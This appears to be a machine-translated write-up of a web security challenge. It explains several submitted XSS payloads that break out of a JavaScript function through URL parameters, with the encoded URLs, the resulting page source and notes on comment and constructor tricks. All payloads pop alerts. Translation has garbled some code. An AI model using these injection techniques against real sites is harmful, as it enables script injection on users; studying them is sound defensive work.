SecProject Web AppSec: XSS parsing Article 1

There are three questions in total, and the difficulty increases in turn. In a js function, if a variable can be enclosed in single quotes without being escaped or filtered, the entire function can be closed and the remaining content can be directly executed as js Code. However, in some cases, the repeated use of variables causes a lot of trouble to the closed function. Here, I will explain some of my questions and answers and learn the XSS skills. After reading it, you will find out how lustful others are. Normal example: Address: http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = 111 & input2 = 222 & input3 = 333 normal source code:

... The use of a prompt, write out the use of: http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = 111 & input2 = 222% 27% 29a} alert % 2811% 29;/* & input3 = 333 */function % 20c % 28% 29 {if % 280% 29 {// http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = 111 & input2 = 222 ') a} alert (11);/* & input3 = 333 */function c () {if (0 ){//
 
Conclusion: When the annotation context in js is controllable, it is a good choice to use/**/. However, only when the preceding information is controllable can I use // to comment a line of content. Variables in a js function can be controlled by closing single brackets, Parentheses (), and braces ({}) to directly execute the code and jump out of the restrictions of the function declaration. Use 2: http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = test1 & input2 = 2% 27% 29 {}}% 20try {/* & input3 = 1 * // % 27} finally {% 280% 29 [% 27 constructor % 27] [% 27 constructor % 27] % 28% 27 \ x61lert \ x28/superevr/% 29% 27% 29% 29 }; {// http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = test1 & input2 = 2') {}} try {/* & input3 = 1 * // '} finally {(0) ['constructor '] ['constructor'] ('\ x61lert \ x28/superevr /)')()};{{//
<SCRIPT language="Javascript">function setid(id, name){   if (document.getElementById('test1').value != '2'){}} try{/*') {      document.getElementById('test1').value= '2'){}} try{/*';   }   if (document.getElementById('test1').value != '1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//') {      document.getElementById('test1').value = '1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//';   }   self.close();}//--></script>
 
 

CONCLUSION: (0) ['constructor '] ['constructor'] ('\ x61lert \ x28/superevr/)') () can be successfully executed. (0) ['constructor'] This is the Number () Function for creating Number object 0. (0) ['constructor'] ['constructor'] Is the Function object (0) ['constructor'] === Numbertrue (0) ['constructor '] ['constructor'] === Functiontrue so the final result is equivalent to Function ('\ x61lert \ x28/superevr/)') () the pop-up dialog box uses three: http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = a & input2 = % 27% 29;} alert % 28% 27 Peter % 20 Jaric % 27% 29; {/* & input3 = * // http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = a & input2 = ');} alert ('Peter Jaric'); {/* & input3 = *///


<SCRIPT language="Javascript">function setid(id, name){if (document.getElementById('a').value != '');}alert('Peter Jaric');{{/*') {document.getElementById('a').value= '');}alert('Peter Jaric');{{/*';}if (document.getElementById('a').value != '*///') {document.getElementById('a').value = '*///';}self.close();}
Similar to the previous discussion, the closure of parentheses is the key. --------------------------- Four: http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input3 = % 2a % 2f % 20% 26% 26% 20% 61% 31% 2e % 72% 65% 70% 6c % 61% 63% 65% 28% 2f % 2e % 2a % 2f % 67% 2c % 61% 6c % 65% 74% 29% 20% 20% 7c % 7c % 27% 73% 3b % 7d % 7d % 65% 74% 69% 64% 28% 29% 3b % 7b % 7b % 2f % 2f & input1 = % 27% 29% 2c % 61% 31% 3d % 22% 74% 68% 65% 77% 6c % 69% 64% 63% 61% 74% 2c % 22% 27 & input2 = % 28% 79% 79% 79% 2f % 2a http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input3 = */& a1.replace (/. */g, alert) | ';}} setid () ;{{// & input1 ='), a1 = "thewildcat ", ('& input2 = yyy '/*
<SCRIPT language="Javascript">function setid(id, name){   if (document.getElementById(''),a1="thewildcat",('').value != 'yyy'/*') {      document.getElementById(''),a1="thewildcat",('').value= 'yyy'/*';   }   if (document.getElementById(''),a1="thewildcat",('').value != '*/ && a1.replace(/.*/g,alert) || ';}}setid();{{//') {      document.getElementById(''),a1="thewildcat",('').value = '*/ && a1.replace(/.*/g,alert) || ';}}setid();{{//';   }   self.close();}//--></script> 
 
After careful reading, we will find that the author encodes all the normal characters in the parameter ...... In this way, it is successfully executed in chrome. If the code is decoded and then executed again, the Code cannot be executed ...... It should be a small bug that can be executed as code after chrome URL Parsing... it is still not feasible. Note this only. Http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input3 = */& a1.replace (/. */g, alert) | ';}} setid () ;{{// & input1 ='), a1 = "thewildcat ", ('& input2 = yyy'/* use five: http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = one & input2 = 100% 27% 29 {}} alert % 28/skeptic_fx/% 29;/* & input3 = three % 27; {{// * // http://sdl.me/challenge1/xss1/JsChallenge1.asp? Input1 = one & input2 = 100 ') {}} alert (/skeptic_fx/);/* & input3 = three ';{{//*///
<SCRIPT language="Javascript">function setid(id, name){if (document.getElementById('one').value != '100'){}}alert(/skeptic_fx/);/*') {document.getElementById('one').value= '100'){}}alert(/skeptic_fx/);/*';}if (document.getElementById('one').value != 'three';{{//*///') {document.getElementById('one').value = 'three';{{//*///';}self.close();}//-->
 
Here we have to say // */This method ...... First, if there is/* in front of it, this sentence will match */, including // */, which will be commented out. Because of the single line comment of //, it will also be commented out later. If there is no pairing with/*, then // works, and will be commented out later, including */, it will not cause any unpairing. This annotation is useful.
Source & reference:Http://soroush.secproject.com/blog/2012/04/secproject-web-appsec-challenge-series-1/ http://soroush.secproject.com/blog/2012/06/challenge-series-1-result-and-conclusion/ http://soroush.secproject.com/blog/projects/hall-of-fame-challenge-series-1/